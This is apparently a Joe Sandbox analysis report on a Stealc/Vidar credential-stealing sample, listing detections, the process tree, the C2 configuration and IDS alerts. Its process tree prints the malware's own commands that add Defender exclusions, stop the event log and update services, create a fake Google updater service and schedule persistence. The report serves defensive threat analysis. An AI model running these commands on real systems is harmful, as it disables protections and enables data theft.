Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
S0FTWARE.exe

Overview

General Information

Sample name:S0FTWARE.exe
Analysis ID:1555865
MD5:bae4ccaa9aa2b36270938dde45d069be
SHA1:cb696fbf4fe475d7f101c74d30cc66d3145c9518
SHA256:e74b15c06a985bbe82864342a4d69e071fcc304f18bccc14848d8a8e21ce956f
Tags:exeuser-4k95m
Infos:

Detection

Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies power options to not sleep / hibernate
Modifies the hosts file
Monitors registry run keys for changes
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Searches for specific processes (likely to inject)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • S0FTWARE.exe (PID: 744 cmdline: "C:\Users\user\Desktop\S0FTWARE.exe" MD5: BAE4CCAA9AA2B36270938DDE45D069BE)
    • BitLockerToGo.exe (PID: 6152 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • chrome.exe (PID: 2724 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2324,i,17997273353640924679,7727149592954305312,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • msedge.exe (PID: 6804 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 7072 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2732 --field-trial-handle=2600,i,17974872305379590479,9492562084942244494,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • AAFIJKKEHJ.exe (PID: 7472 cmdline: "C:\ProgramData\AAFIJKKEHJ.exe" MD5: FBBA09E1B1024A3E7B88D06B53AD3716)
        • powershell.exe (PID: 7536 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 7744 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 1396 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wusa.exe (PID: 6072 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
        • sc.exe (PID: 348 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7804 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7828 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7960 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 3876 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 2664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 5992 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 2792 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 6580 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 4796 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 3352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 4088 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 3408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 6064 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 2748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 5080 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 1124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 2972 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • GHDAKKJJJK.exe (PID: 8032 cmdline: "C:\ProgramData\GHDAKKJJJK.exe" MD5: 18F4B337AD6BEB8E7EE040BCC8C049DF)
        • cmd.exe (PID: 8072 cmdline: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 8084 cmdline: schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
      • cmd.exe (PID: 7300 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCGHJEBGHJKE" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 7312 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • svchost.exe (PID: 4424 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 6828 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 4564 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2728 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7172 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6720 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7184 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6920 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • svchost.exe (PID: 612 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7908 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s lfsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Updater.exe (PID: 8020 cmdline: C:\ProgramData\GoogleUP\Chrome\Updater.exe MD5: FBBA09E1B1024A3E7B88D06B53AD3716)
  • service.exe (PID: 8132 cmdline: C:\Users\user\AppData\Roaming\service.exe MD5: 18F4B337AD6BEB8E7EE040BCC8C049DF)
    • cmd.exe (PID: 6192 cmdline: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5548 cmdline: schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199801589826", "https://t.me/m07mbk"], "Botnet": "27536a38d3707b6600f28b9d7177a12c"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            00000000.00000002.2247474253.0000000013A80000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
            • 0x0:$x1: 4d5a9000030000000
            00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 32 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              3.2.BitLockerToGo.exe.2a00000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                3.2.BitLockerToGo.exe.2a00000.0.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                  3.2.BitLockerToGo.exe.2a00000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.2.S0FTWARE.exe.13780000.5.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      0.2.S0FTWARE.exe.13780000.5.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                        Click to see the 44 entries

                        Sigma Signatures

                        Change of critical system settings

                        barindex
                        Sigma detected: Disable power options
                        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\ProgramData\AAFIJKKEHJ.exe" , ParentImage: C:\ProgramData\AAFIJKKEHJ.exe, ParentProcessId: 7472, ParentProcessName: AAFIJKKEHJ.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5992, ProcessName: powercfg.exe

                        System Summary

                        barindex
                        Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, CommandLine: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\ProgramData\GHDAKKJJJK.exe" , ParentImage: C:\ProgramData\GHDAKKJJJK.exe, ParentProcessId: 8032, ParentProcessName: GHDAKKJJJK.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, ProcessId: 8072, ProcessName: cmd.exe
                        Sigma detected: Invoke-Obfuscation VAR+ Launcher
                        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, CommandLine: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\ProgramData\GHDAKKJJJK.exe" , ParentImage: C:\ProgramData\GHDAKKJJJK.exe, ParentProcessId: 8032, ParentProcessName: GHDAKKJJJK.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, ProcessId: 8072, ProcessName: cmd.exe
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\AAFIJKKEHJ.exe" , ParentImage: C:\ProgramData\AAFIJKKEHJ.exe, ParentProcessId: 7472, ParentProcessName: AAFIJKKEHJ.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7536, ProcessName: powershell.exe
                        Sigma detected: Browser Started with Remote Debugging
                        Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 6152, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 2724, ProcessName: chrome.exe
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\AAFIJKKEHJ.exe" , ParentImage: C:\ProgramData\AAFIJKKEHJ.exe, ParentProcessId: 7472, ParentProcessName: AAFIJKKEHJ.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7536, ProcessName: powershell.exe
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, CommandLine: schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8072, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, ProcessId: 8084, ProcessName: schtasks.exe
                        Sigma detected: New Service Creation Using Sc.EXE
                        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\ProgramData\AAFIJKKEHJ.exe" , ParentImage: C:\ProgramData\AAFIJKKEHJ.exe, ParentProcessId: 7472, ParentProcessName: AAFIJKKEHJ.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto", ProcessId: 6064, ProcessName: sc.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\AAFIJKKEHJ.exe" , ParentImage: C:\ProgramData\AAFIJKKEHJ.exe, ParentProcessId: 7472, ParentProcessName: AAFIJKKEHJ.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7536, ProcessName: powershell.exe
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4424, ProcessName: svchost.exe

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Sigma detected: Stop EventLog
                        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\ProgramData\AAFIJKKEHJ.exe" , ParentImage: C:\ProgramData\AAFIJKKEHJ.exe, ParentProcessId: 7472, ParentProcessName: AAFIJKKEHJ.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 5080, ProcessName: sc.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-14T15:29:47.538600+010020283713Unknown Traffic192.168.2.55015551.105.71.136443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-14T15:25:48.791498+010020442471Malware Command and Control Activity Detected116.203.0.159443192.168.2.549864TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-14T15:25:50.284090+010020518311Malware Command and Control Activity Detected116.203.0.159443192.168.2.549875TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-14T15:25:50.283580+010020490871A Network Trojan was detected192.168.2.549875116.203.0.159443TCP
